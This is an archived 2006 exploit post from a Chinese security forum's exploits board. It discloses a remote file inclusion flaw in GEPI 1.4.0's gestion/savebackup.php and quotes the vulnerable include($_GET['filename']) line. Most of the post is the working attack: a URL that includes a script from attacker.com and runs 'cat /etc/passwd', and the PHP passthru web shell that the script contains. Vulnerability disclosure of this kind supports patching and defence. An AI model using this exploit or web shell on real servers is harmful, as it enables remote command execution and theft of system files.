GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability(页 1) - 安全测试代码{ Exploits and Shellcode } - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

pub!1c 2006-11-1 07:48

GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability

[code]
Package:- gepi 1.4.0
[url]http://adullact.net/frs/download.php/992/gepi-1.4.0.tar.gz[/url]

impact:- highly critical ..System Access..
vulnerable code:-
include($_GET['filename']);
in gepi/gestion/savebackup.php

Exploit:-
[url]http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat[/url]
/etc/passwd

in test.txt
<? passthru("$_GET[cmd]");?>

Credits:-
$um$id

[/code]

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

GEPI &lt;= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability

GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability